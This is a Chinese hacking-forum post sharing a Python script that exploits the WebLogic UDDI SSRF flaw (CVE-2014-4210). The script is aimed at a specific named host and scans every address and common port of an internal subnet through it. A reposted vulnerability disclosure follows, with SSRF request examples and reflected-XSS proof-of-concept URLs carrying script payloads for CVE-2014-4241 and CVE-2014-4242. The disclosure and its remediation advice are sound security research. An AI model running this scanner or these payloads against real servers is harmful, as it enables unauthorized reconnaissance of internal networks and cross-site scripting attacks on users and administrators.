搜索
查看: 544|回复: 0

WebLogic SSRF简易的利用脚本

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2016-4-12 21:02:48 | 显示全部楼层 |阅读模式
  1. #!/usr/bin/env python  
  2. # -*- coding: utf-8 -*-
  3. import re
  4. import sys
  5. import time
  6. import thread
  7. import requests
  8.   
  9. def scan(ip_str):
  10.     ports = ('21','22','23','53','80','135','139','443','445','1080','1433','1521','3306','3389','4899','8080','7001','8000',)
  11.     for port in ports:
  12.         exp_url = "http://weblogic.0day5.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str,port)

  13.         try:
  14.             response = requests.get(exp_url, timeout=15, verify=False)
  15.             #SSRF判断
  16.             re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',response.content)
  17.             #丢失连接.端口连接不上
  18.             re_sult2 = re.findall('but could not connect',response.content)

  19.             if len(re_sult1)!=0 and len(re_sult2)==0:
  20.                 print ip_str+':'+port

  21.         except Exception, e:
  22.             pass
  23.          
  24. def find_ip(ip_prefix):
  25.     '''
  26.     给出当前的192.168.1 ,然后扫描整个段所有地址
  27.     '''
  28.     for i in range(1,256):
  29.         ip = '%s.%s'%(ip_prefix,i)
  30.         thread.start_new_thread(scan, (ip,))
  31.         time.sleep(3)
  32.       
  33. if __name__ == "__main__":
  34.     commandargs = sys.argv[1:]
  35.     args = "".join(commandargs)
  36.    
  37.     ip_prefix = '.'.join(args.split('.')[:-1])
  38.     find_ip(ip_prefix)
复制代码

得到的结果

也可以xss,不止SSRF:

#WebLogic SSRF And XSS (CVE-2014-4241, CVE-2014-4210, CVE-2014-4242)
#refer:http://blog.csdn.net/cnbird2008/article/details/45080055

http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html


Universal Description Discovery and Integration (UDDI) functionality often lurks unlinked but externally accessible on WebLogic servers. It’s trivially discoverable using fuzz lists such as Weblogic.fuzz.txt and was, until recently, vulnerable to Cross Site Scripting (XSS) and Server Side Request Forgery (SSRF). I reported these vulnerabilities to Oracle and they were patched in the July 2014 Critical Patch Update (CPU).
CVE-2014-4210 Server Side Request Forgery in SearchPublicRegistries.jsp

Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6
Oracle WebLogic web server is often both (a) externally accessible; and (b) permitted to invoke connections to internal hosts. The SearchPublicRegistries.jsp page can be abused by unauthenticated attackers to cause the WebLogic web server to connect to an arbitrary TCP port of an arbitrary host. Responses returned are fairly verbose and can be used to infer whether a service is listening on the port specified.

Below is an example request to an internal host which is not listening on TCP port 23:


https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search


Response snippet:


weblogic.uddi.client.structures.exception.XML_SoapException: Connection refused


Below is an example request to a host which is listening on TCP port 22:

https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search


Response snippet:

weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.0.0.4:22 which did not have a valid SOAP content-type: unknown/unknown.


It is possible to abuse this functionality to discover and port scan any host that the WebLogic server can access. In the event that a discovered service returns a valid SOAP response, it may be possible to view the contents of the response.

SSRF vulnerabilities offer a world of possibilities – for example, this could be used to scan for services and resources present on the WebLogic server’s loopback interface, to port scan hosts adjacent to the WebLogic server, or to profile outgoing firewall rules (e.g. port scan an external attacker-controlled server to see which outgoing connections are permitted).

CVE-2014-4241 - Reflected Cross Site Scripting in SetupUDDIExplorer.jsp
Affected software: Oracle Fusion Middleware 10.0.2, 10.3.6
User input is reflected into a cookie value (which is set for a year!). This value  is then written into subsequent responses in an unsafe manner, exposing users to Cross Site scripting attacks.
This unusual vector circumvents current in-browser anti-XSS controls present in Internet Explorer and Chrome browsers. The vulnerability was present in registration.paypal.com, payflowlink.paypal.com and partnermanager.paypal.com; all were swiftly fixed after I reported this to the PayPal security team.



Reflected XSS in registration.paypal.com
Example Malicious URL:

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL

The response sets the privateregistry parameter value previously supplied as a cookie, and redirects the browser back to the SetupUDDIExplorer.jsp page:


HTTP/1.1 302 Moved TemporarilyLocation: https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jspSet-Cookie: privateinquiryurls=<script>alert(2)</script>; expires=Saturday, 29-Nov-2014 08:00:27 GMTContent-Length: 331Content-Type: text/html;charset=UTF-8


Redirected Request:


GET /uddiexplorer/SetupUDDIExplorer.jsp HTTP/1.1Host: [vulnerablehost]Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; privateinquiryurls=<script>alert(2)</script>; privatepublishurls=http://[vulnerablehost]:8080/uddi/uddilistener; consumer_display=HOME_VERSION%3d1%26FORGOT_BUTTON_ROLE%3d73; cookie_check=yes; LANG=en_US%3BUS; navlns=0.0;


Response Snippet (showing the privateinquiryurls cookie value reflected in an unsafe manner in the response):


<td valign=top width=1%></td><td valign=top width=70%>  <p>  <h2>Private Registry:</h2>  <h3>Search URL: <b><script>alert(1)</script></b></h3>  <H3>Publish URL: <b>http://[vulnerablehost]:8080/uddi/uddilistener</b></h3>  </p>


Example Proof of Concept URLs:

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URLhttps://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2</script>&setPrivateRegistryPublish=Set+Publish+URLhttps://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?publicregistryname=test&publicregistryurl=<script>alert(2)</script>&addPublicRegistry=Add+Public+Registry+URL


CVE-2014-4242 - Reflected Cross Site Scripting in consolejndi.portal
Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6, 12.1.1, 12.1.2.0.0

I’ve also identified two reflected XSS vulnerabilities in WebLogic’s console application. The console application is intended to manage the WebLogic application server and is not normally externally exposed; as a result, exploitation of this vulnerability would be targeted at admin users.
Example Proof of Concept URL #1 (victim must be authenticated to the administrative console):


http://[vulnerablehost]:7001/console/consolejndi.portal?_pageLabel=JNDIContextPageGeneral&_nfpb=true&JNDIContextPortlethandle=com.bea.console.handles.JndiContextHandle("<script>alert(1)</script>")


Response Snippet:

<div class="contenttable"><div class="introText"><p>Listing of entries found in context <script>alert(1)</script>:</p></div>


Example Proof of Concept URL #2 (victim must be authenticated to the administrative console):

http://[vulnerablehost]:7001/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//


Response Snippet:

<script type="text/javascript">document.write('<div class="JSTree">');setBaseDirectory('/console/utils/JStree/images/');setTaxonomyDelimeter('.');{_a = new TreeNode('server', null, 'myserver\u0027);alert(4)//', '/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//', 'images/spacer.gif', 'images/spacer.gif', null, 'myserver\u0027);alert(4)//', false, false);



Remediation

Remove access to UDDI functionality, unless there is business case to support exposing it. Failing that, ensure that the July 2014 CPU has been applied.

Disclosure Timeline
01/12/2013 - Vulnerability Reported
07/16/2014 - Vulnerability Patch Released in Oracle Critical Patch Update (CPU)

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表